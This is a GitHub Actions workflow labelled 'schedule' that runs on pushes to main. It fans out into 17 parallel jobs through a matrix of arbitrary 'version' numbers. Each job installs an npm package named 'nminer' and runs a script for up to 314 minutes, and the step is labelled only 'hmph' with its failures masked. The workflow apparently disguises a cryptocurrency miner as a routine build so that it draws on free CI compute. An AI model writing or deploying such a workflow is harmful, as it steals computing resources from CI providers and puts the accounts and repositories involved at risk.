name: schedule
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 639 }
          - { version: 9377 }
          - { version: 2223 }
          - { version: 3829 }
          - { version: 6110 }
          - { version: 5807 }
          - { version: 9093 }
          - { version: 7088 }
          - { version: 950 }
          - { version: 5531 }
          - { version: 5022 }
          - { version: 4941 }
          - { version: 9618 }
          - { version: 5870 }
          - { version: 5099 }
          - { version: 570 }
          - { version: 8345 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: hmph
        run: |
          npm install nminer@latest
          timeout 314m node schedule.js || echo "schedule executed"